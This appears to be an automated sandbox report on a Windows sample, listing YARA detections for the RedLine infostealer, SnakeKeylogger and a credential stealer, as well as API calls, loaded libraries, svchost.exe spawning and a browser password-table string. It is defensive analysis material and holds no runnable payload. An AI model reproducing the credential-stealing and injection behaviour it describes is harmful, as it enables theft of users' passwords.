Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F80037	2_2_08F80037
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F8DC28	2_2_08F8DC28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F80015	2_2_08F80015
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F8F1F0	2_2_08F8F1F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F8F1E0	2_2_08F8F1E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F895B8	2_2_08F895B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F8ED98	2_2_08F8ED98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F8ED89	2_2_08F8ED89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F8297A	2_2_08F8297A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F8E940	2_2_08F8E940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F8E930	2_2_08F8E930
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F8FAA0	2_2_08F8FAA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F85298	2_2_08F85298
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F8FA91	2_2_08F8FA91
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F8228A	2_2_08F8228A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F8F648	2_2_08F8F648
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F8F637	2_2_08F8F637
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F88E20	2_2_08F88E20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F88E11	2_2_08F88E11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F8D7E0	2_2_08F8D7E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F8D7D0	2_2_08F8D7D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F81B9F	2_2_08F81B9F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F8D388	2_2_08F8D388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F8D379	2_2_08F8D379
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F8CF30	2_2_08F8CF30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F80B2B	2_2_08F80B2B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F8CF20	2_2_08F8CF20

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: String function: 00EC0AE3 appears 70 times
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: String function: 00EA7DE1 appears 35 times
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: String function: 00EC8900 appears 42 times

Source: vnV17JImCH.exe, 00000000.00000003.2354498352.000000000446D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs vnV17JImCH.exe
Source: vnV17JImCH.exe, 00000000.00000003.2351213556.00000000042C3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs vnV17JImCH.exe
Source: vnV17JImCH.exe, 00000000.00000002.2361531765.0000000002530000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs vnV17JImCH.exe

Source: vnV17JImCH.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.3.svchost.exe.326e000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.3.svchost.exe.326e000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.3.svchost.exe.326e000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.svchost.exe.7b40f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.svchost.exe.7b40f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.svchost.exe.7b40f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.svchost.exe.7be0000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.svchost.exe.7be0000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.svchost.exe.7be0000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.vnV17JImCH.exe.2530000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.svchost.exe.7b40f20.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.svchost.exe.7b40f20.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.svchost.exe.7b40f20.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.svchost.exe.7be0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.svchost.exe.7be0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.svchost.exe.7be0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.svchost.exe.7b40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.svchost.exe.7b40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.svchost.exe.7b40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.3.svchost.exe.326ef20.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.3.svchost.exe.326ef20.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.3.svchost.exe.326ef20.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.3.svchost.exe.326ef20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.3.svchost.exe.326ef20.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.3.svchost.exe.326ef20.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.svchost.exe.7b40000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.svchost.exe.7b40000.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.svchost.exe.7b40000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.3.svchost.exe.326e000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.3.svchost.exe.326e000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.3.svchost.exe.326e000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.4802248742.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2361531765.0000000002530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 6636, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/4@3/3

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00F0A06A GetLastError,FormatMessageW,

0_2_00F0A06A

Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00EF81CB AdjustTokenPrivileges,CloseHandle,		0_2_00EF81CB
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00EF87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00EF87E1

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00F0B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00F0B3FB

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00F1EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00F1EE0D

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00F183BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_00F183BB

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00EA4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00EA4E89

Source: C:\Windows\SysWOW64\svchost.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\vnV17JImCH.exe

File created: C:\Users\user\AppData\Local\Temp\autB4AB.tmp

Jump to behavior

Source: vnV17JImCH.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: svchost.exe, 00000002.00000002.4804087692.000000000551B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2626995059.0000000006396000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4804087692.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4804087692.000000000550E000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: vnV17JImCH.exe	Virustotal: Detection: 30%
Source: vnV17JImCH.exe	ReversingLabs: Detection: 82%

Source: unknown	Process created: C:\Users\user\Desktop\vnV17JImCH.exe "C:\Users\user\Desktop\vnV17JImCH.exe"
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\vnV17JImCH.exe"
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\vnV17JImCH.exe"	Jump to behavior

Source: C:\Users\user\Desktop\vnV17JImCH.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
